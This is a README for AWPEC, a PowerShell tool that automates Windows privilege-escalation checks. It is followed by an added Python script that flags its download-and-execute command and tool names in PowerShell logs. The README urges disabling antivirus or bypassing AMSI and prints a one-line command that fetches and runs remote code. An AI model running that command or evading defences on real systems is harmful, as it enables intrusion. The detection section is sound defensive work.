PowerShell script that automates the tedious tasks of Windows Privilege Escalation
AWPEC runs the following privilege escalation tools in memory:
- PowerUp
- Seatbelt
- PrivescCheck
- WinPEAS
It also supports running ADRecon and auditing the results if you find yourself within an Active Directory domain context.
Since the AWPEC PowerShell script relies on various third-party tools, which are known for being flagged by AV, we have to either disable antivirus or actively bypass AMSI. Furthermore, because we use PowerSharpPack, which reflectively loads C# code, we must bypass AMSI for .NET as well. A basic AMSI PS bypass is not sufficient!
So open a low-priv PowerShell terminal session, bypass AMSI (PS + .NET) and then run the PS script:
```powershell
# run the AWPEC script
iex(new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Haxxnet/AWPEC/main/Invoke-AWPEC.ps1')
```
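For defenders: when PowerShell script block logging is enabled, the download-and-execute one-liner above and the tool names listed earlier appear as plain strings in event ID 4104 records. The following Python triage is an added example, not part of AWPEC; the scoring weights, the threshold and the sample events are constructed assumptions.

```python
import re

# Names of the tools this README says AWPEC loads, plus the script itself.
TOOL_NAMES = re.compile(
    r"\b(Invoke-AWPEC|PowerSharpPack|PowerUp|Seatbelt|PrivescCheck|WinPEAS|ADRecon)\b",
    re.IGNORECASE,
)
# The two halves of a download-and-execute one-liner, matched separately so
# both "iex(...DownloadString(...))" and "...DownloadString(...) | iex" hit.
IEX = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
DOWNLOAD = re.compile(r"Net\.WebClient\b.*?\.DownloadString\s*\(", re.IGNORECASE | re.DOTALL)
PS1_URL = re.compile(r"https?://[^\s'\"]+\.ps1", re.IGNORECASE)


def triage(script_block):
    """Score one ScriptBlockText value (PowerShell event ID 4104)."""
    tools = sorted({m.group(1).lower() for m in TOOL_NAMES.finditer(script_block)})
    cradle = bool(IEX.search(script_block) and DOWNLOAD.search(script_block))
    urls = PS1_URL.findall(script_block)
    # Weights are an assumption for illustration, not a tuned model.
    score = 3 * cradle + 2 * len(tools) + (1 if urls else 0)
    return {"cradle": cradle, "tools": tools, "urls": urls, "score": score}


def flag(events, threshold=3):
    """Return (index, result) for every event scoring at or above threshold."""
    hits = []
    for i, text in enumerate(events):
        result = triage(text)
        if result["score"] >= threshold:
            hits.append((i, result))
    return hits


# Constructed sample ScriptBlockText values; the first is the README's command.
SAMPLE_EVENTS = [
    "iex(new-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/Haxxnet/AWPEC/main/Invoke-AWPEC.ps1')",
    r"Get-ChildItem C:\Users | Sort-Object Length",
    "(New-Object System.Net.WebClient).DownloadString("
    "'http://intranet.example/setup.ps1') | IEX",
    r"Import-Module .\PrivescCheck.ps1",
]

if __name__ == "__main__":
    for index, result in flag(SAMPLE_EVENTS):
        print(index, result)
```

Feed it ScriptBlockText values exported from the Microsoft-Windows-PowerShell/Operational log. String matching of this kind is defeated by renaming or obfuscation, so a hit is a triage signal, not a verdict.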
Many thanks to the following individuals: